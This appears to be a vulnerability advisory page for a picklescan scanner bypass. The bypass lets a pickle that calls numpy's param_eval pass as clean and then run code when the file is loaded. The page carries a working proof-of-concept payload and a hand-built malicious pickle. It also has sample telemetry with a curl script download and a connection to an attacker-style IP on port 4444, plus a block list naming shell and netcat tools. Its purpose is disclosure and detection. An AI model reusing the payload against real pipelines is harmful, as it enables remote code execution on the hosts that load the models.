GHSA-cffc-mxrf-mhh4: picklescan: Code Injection enables RCE

GHSA-cffc-mxrf-mhh4 MEDIUM
Published December 29, 2025
CISO Take

picklescan — the de-facto ML model safety scanner — has a scanner bypass that allows malicious pickle files to pass as clean while executing arbitrary code on load. Any pipeline using picklescan < 0.0.33 as a security gate is providing a false sense of security, which is worse than no gate at all. Patch to v0.0.33 immediately and re-scan every model file previously cleared by older versions.

What is the risk?

GitHub rates the advisory MEDIUM and no CVSS vector has been assigned, but the effective severity for an ML pipeline is HIGH. The vulnerability does not just introduce a new attack path; it nullifies an existing compensating control that ML teams explicitly trust for model safety validation. Exploitability is moderate: it requires numpy in the target environment (near-universal in ML stacks) and the ability to deliver a malicious file into the scan queue. Blast radius is significant: RCE on model serving or training infrastructure with no sandbox to escape, since the payload runs with the full privileges of whatever process calls pickle.load().

What systems are affected?

Package: picklescan
Ecosystem: pip
Vulnerable range: < 0.0.33
Patched: 0.0.33

Do you use picklescan < 0.0.33 as a scanning gate? You're affected.

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What should I do?

5 steps
  1. Patch: Update picklescan to >= 0.0.33 immediately across all environments.

  2. Re-scan: Retroactively re-validate all model files previously cleared by older picklescan versions — treat prior results as untrusted.

  3. Migrate format: Where possible, switch PyTorch model storage to safetensors, which stores only tensor data and eliminates the pickle deserialization attack surface entirely; checkpoints that pickle arbitrary Python objects, such as custom classes, need refactoring first.

  4. Defense-in-depth: Never rely on a single scanner as the sole control; add sandboxed model loading (isolated containers with no network access and restricted syscalls).

  5. Detection: Alert on anomalous child process spawning from ML worker processes and unusual network connections originating from model loading jobs.
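Step 5 as code, as an added example that is not part of the original page: a small detector over constructed process-start and outbound-connect telemetry (JSON lines, shaped like what an EDR or auditd pipeline would emit, not real logs) from a model-serving host. It flags shells, download tools and ad-hoc interpreter children spawned by a process that looks like a model loader, while excepting the multiprocessing spawn helper that worker pools legitimately use, and flags outbound connections from that loader to anything outside an egress allow-list. The loader heuristics, the child-process lists and the allowed destination are assumptions to tune per environment.

```python
import json
import os

# Constructed sample telemetry (not real logs): process-start and outbound-connect
# events from one ML worker host, one JSON object per line. pid 4101 is a model
# server that has just loaded a malicious checkpoint.
SAMPLE_LOG = """\
{"type": "process_start", "ts": "2025-12-30T10:00:01Z", "pid": 4101, "ppid": 1, "image": "/usr/bin/python3", "cmdline": "python3 serve.py --model /models/finetuned.pt"}
{"type": "net_connect", "ts": "2025-12-30T10:00:01Z", "pid": 4101, "dst": "10.0.5.20:443"}
{"type": "process_start", "ts": "2025-12-30T10:00:02Z", "pid": 4102, "ppid": 4101, "image": "/usr/bin/python3", "cmdline": "python3 -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7)"}
{"type": "process_start", "ts": "2025-12-30T10:00:03Z", "pid": 4103, "ppid": 4101, "image": "/bin/sh", "cmdline": "sh -c ls"}
{"type": "process_start", "ts": "2025-12-30T10:00:04Z", "pid": 4104, "ppid": 4101, "image": "/usr/bin/curl", "cmdline": "curl -s http://203.0.113.9/s.sh"}
{"type": "process_start", "ts": "2025-12-30T10:00:05Z", "pid": 4105, "ppid": 4101, "image": "/usr/bin/python3", "cmdline": "python3 -c import os;os.system('id')"}
{"type": "net_connect", "ts": "2025-12-30T10:00:06Z", "pid": 4101, "dst": "203.0.113.9:4444"}
{"type": "process_start", "ts": "2025-12-30T10:00:07Z", "pid": 5000, "ppid": 1, "image": "/bin/bash", "cmdline": "bash /opt/ci/build.sh"}
"""

# Heuristics (assumptions, tune per environment): what marks a process as an ML
# worker, which children it should never spawn, and where it may legitimately connect.
INTERPRETERS = {"python", "python3", "python3.11", "python3.12"}
MODEL_LOADER_MARKERS = (".pt", ".pth", ".pkl", ".bin", "serve.py", "train.py", "--model")
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat", "socat", "perl"}
ALLOWED_EGRESS = {"10.0.5.20:443"}  # constructed: the internal model registry


def basename(image: str) -> str:
    return os.path.basename(image)


def is_model_loader(ev: dict) -> bool:
    """An interpreter whose command line references a model artifact or job script."""
    return basename(ev["image"]) in INTERPRETERS and any(
        marker in ev["cmdline"] for marker in MODEL_LOADER_MARKERS
    )


def is_suspicious_child(ev: dict) -> bool:
    """Shells and download tools are never expected under a model loader. An interpreter
    started with `-c` is flagged too, except the spawn helper multiprocessing uses for workers."""
    name = basename(ev["image"])
    if name in SUSPICIOUS_CHILDREN:
        return True
    return name in INTERPRETERS and " -c " in ev["cmdline"] and "multiprocessing" not in ev["cmdline"]


def detect(lines) -> list[dict]:
    """Run both rules over JSON-lines telemetry and return the alerts in event order."""
    events = [json.loads(line) for line in lines if line.strip()]
    procs = {ev["pid"]: ev for ev in events if ev["type"] == "process_start"}
    alerts = []
    for ev in events:
        if ev["type"] == "process_start":
            parent = procs.get(ev["ppid"])
            if parent and is_model_loader(parent) and is_suspicious_child(ev):
                alerts.append({"rule": "loader_spawned_child", "ts": ev["ts"], "pid": ev["pid"],
                               "ppid": ev["ppid"], "detail": ev["cmdline"]})
        elif ev["type"] == "net_connect":
            proc = procs.get(ev["pid"])
            if proc and is_model_loader(proc) and ev["dst"] not in ALLOWED_EGRESS:
                alerts.append({"rule": "loader_unexpected_egress", "ts": ev["ts"], "pid": ev["pid"],
                               "ppid": proc["ppid"], "detail": ev["dst"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(json.dumps(alert))
```

On the sample above the detector raises four alerts: the `sh -c ls` from the advisory's PoC, the `curl` stager, the ad-hoc `python3 -c` child, and the connection to 203.0.113.9:4444; the multiprocessing worker, the registry connection and the unrelated CI shell under pid 1 stay quiet. In production the parent-to-child join should be done against the telemetry source's own process tree rather than a per-batch pid map, since pids recycle.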

How is it classified?

Which compliance frameworks are affected?

This advisory is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system supply chain
Clause 8.4 - AI system resources and lifecycle management
Clause 8.7 - AI system security and resilience
NIST AI RMF
GOVERN-6.2 - Policies and procedures for third-party AI risks
MANAGE-2.4 - Residual risks from third-party AI components are monitored and managed
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-cffc-mxrf-mhh4?

GHSA-cffc-mxrf-mhh4 is a detection bypass in picklescan versions before 0.0.33. A pickle whose __reduce__ callable is numpy.f2py.crackfortran.param_eval is reported clean, because that function was not on the scanner's blocklist, yet param_eval passes its first argument to eval(), so the attacker's string runs as Python code the moment pickle.load() is called. Any pipeline using an older picklescan as its only gate has been passing malicious models as clean; patch to 0.0.33 and re-scan everything those versions cleared.

Is GHSA-cffc-mxrf-mhh4 actively exploited?

No confirmed active exploitation of GHSA-cffc-mxrf-mhh4 has been reported, but organizations should still patch proactively.

How to fix GHSA-cffc-mxrf-mhh4?

Follow the five steps under "What should I do?": update picklescan to >= 0.0.33 everywhere, re-scan every model file cleared by older versions, move PyTorch storage to safetensors where possible, load models only in sandboxed containers without network access, and alert on child processes and unexpected network connections from model-loading jobs.

What systems are affected by GHSA-cffc-mxrf-mhh4?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, PyTorch model loading workflows.

What is the CVSS score for GHSA-cffc-mxrf-mhh4?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

training pipelines, model serving, MLOps CI/CD pipelines, model registries, PyTorch model loading workflows

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0058 Publish Poisoned Models
AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2, Clause 8.4, Clause 8.7
NIST AI RMF: GOVERN-6.2, MANAGE-2.4
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

### Summary

Picklescan uses numpy.f2py.crackfortran.param_eval, which is a function in numpy to execute remote pickle files.

### Details

The attack payload executes in the following steps:

- First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.param_eval function via the reduce method.
- Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.

### PoC

```python
import pickle


class RCE:
    def __reduce__(self):
        # Not on picklescan's blocklist before 0.0.33; param_eval() passes its first argument to eval().
        from numpy.f2py.crackfortran import param_eval
        return (param_eval, ("os.system('ls')", None, None, None))


payload = pickle.dumps(RCE())  # scans clean, runs `ls` when pickle.load()ed
```

### Impact

Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Report by

Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).

Exploitation Scenario

An adversary targets an organization's ML model supply chain. They craft a malicious PyTorch .pkl file using numpy.f2py.crackfortran.param_eval as the __reduce__ callable, a numpy function that was not on picklescan's blocklist before 0.0.33. The file is uploaded to a public model registry (e.g., HuggingFace Hub) as a legitimate-looking fine-tuned model. The victim organization's automated pipeline downloads and scans it with picklescan; the scan returns clean. Trusting the result, the pipeline calls pickle.load() and the payload executes: a reverse shell, credential harvester, or persistent backdoor planted in the training environment. From there, the adversary pivots to exfiltrate proprietary training data or poison downstream model artifacts.
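The bypass in action and the scanner design that would catch it, as an added example that is not part of the original advisory or of picklescan's own code; it serves both the PoC above and the defense-in-depth step in the remediation list. The payload bytes are assembled by hand from pickle opcodes, so the script runs without numpy installed and never calls pickle.load() on them. referenced_globals() walks the opcode stream with pickletools.genops and records every module/name the pickle would import. A deny-list check in the style the bypass defeats reports the payload clean, because numpy.f2py.crackfortran.param_eval is not a name it knows; an allow-list check of what a checkpoint is permitted to import flags it. The DENY_LIST and ALLOW_LIST contents are assumptions for illustration, and the torch entries should be derived from your own known-good checkpoints.

```python
import collections
import pickle
import pickletools

# The advisory's payload assembled by hand as raw opcodes (constructed here so the
# example runs without numpy and never executes anything): GLOBAL imports
# numpy.f2py.crackfortran.param_eval, then REDUCE calls it as
# param_eval("os.system('ls')", None, None, None).
MALICIOUS_PICKLE = (
    b"\x80\x02"                                # PROTO 2
    b"cnumpy.f2py.crackfortran\nparam_eval\n"  # GLOBAL module\nname\n
    b"("                                       # MARK
    b"X\x0f\x00\x00\x00os.system('ls')"        # BINUNICODE, 15-byte string
    b"NNN"                                     # NONE x3: g_params, params, dimspec
    b"t"                                       # TUPLE -> the 4-tuple of arguments
    b"R"                                       # REDUCE -> param_eval(*args) on load
    b"."                                       # STOP
)

# A benign object of the kind a state_dict carries, pickled with protocol 4 so the
# global reference arrives as STACK_GLOBAL rather than GLOBAL.
BENIGN_PICKLE = pickle.dumps(collections.OrderedDict([("weight", [0.1, 0.2])]), protocol=4)

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the pickle will import, found by walking opcodes only."""
    refs, recent_strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent_strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            # protocol 4+: module and name are the two strings pushed just before
            refs.append((recent_strings[-2], recent_strings[-1]))
    return refs


# Deny-list in the style the bypass defeats: well-known dangerous callables only (assumption).
DENY_LIST = {("os", "system"), ("posix", "system"), ("subprocess", "Popen"),
             ("builtins", "eval"), ("builtins", "exec")}

# Allow-list: what this checkpoint format is permitted to import. The torch entries are
# what a typical torch.save() state_dict references (assumption; derive the real list
# from your own known-good checkpoints).
ALLOW_LIST = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2"),
              ("torch", "FloatStorage"), ("torch", "LongStorage")}


def blocklist_verdict(data: bytes) -> str:
    """Known-bad matching: misses any unlisted callable that reaches eval()."""
    return "dangerous" if any(ref in DENY_LIST for ref in referenced_globals(data)) else "clean"


def allowlist_verdict(data: bytes) -> tuple[str, list[tuple[str, str]]]:
    """Known-good matching: anything outside the expected import set fails closed."""
    unknown = [ref for ref in referenced_globals(data) if ref not in ALLOW_LIST]
    return ("dangerous" if unknown else "clean", unknown)


if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_PICKLE), ("benign", BENIGN_PICKLE)):
        print(label, "blocklist:", blocklist_verdict(blob), "allowlist:", allowlist_verdict(blob))
```

The allow-list approach is the defense-in-depth the remediation steps call for: instead of asking whether a callable is known-bad, it asks whether it is known-good for this artifact type, so the next unlisted numpy or stdlib helper that reaches eval() fails closed instead of passing. Note that opcode walking sees only what the pickle imports, not what those callables do, which is exactly why the list must be closed rather than open.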

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.

Timeline

Published: December 29, 2025
Last Modified: December 29, 2025
First Seen: March 24, 2026
